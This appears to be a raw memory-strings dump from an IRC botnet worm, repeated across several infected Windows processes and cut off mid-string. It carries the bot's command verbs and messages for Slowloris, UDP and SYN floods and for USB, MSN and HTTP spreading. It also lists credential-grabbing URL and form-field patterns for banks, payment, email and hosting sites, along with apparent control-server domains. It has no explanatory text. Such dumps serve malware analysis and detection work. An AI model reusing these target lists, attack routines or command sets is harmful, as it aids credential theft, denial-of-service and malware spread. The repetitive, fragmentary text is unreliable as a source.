:%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97\??\%System%\winlogon.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exeservices.exe_752_rwx_00E30000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\services.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\services.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exesvchost.exe_948_rwx_009F0000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\svchost.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\svchost.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exesvchost.exe_1016_rwx_00AD0000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhttp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\c1419a97%System%\svchost.exe%WinDir%%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe7 767<7~78*808;8~8%s\Identities\%s.exe\\.\pipeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\winlogon.exenotepad.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\WINDOWS\system32\svchost.exeC:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exesvchost.exe_1100_rwx_02340000_0004E000:
.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL05%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dftp://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhttp://%s/%shttp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)http://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Run\\.\%c:*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dllm1xg.orgmxxtxxt.bizmeob.me]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished 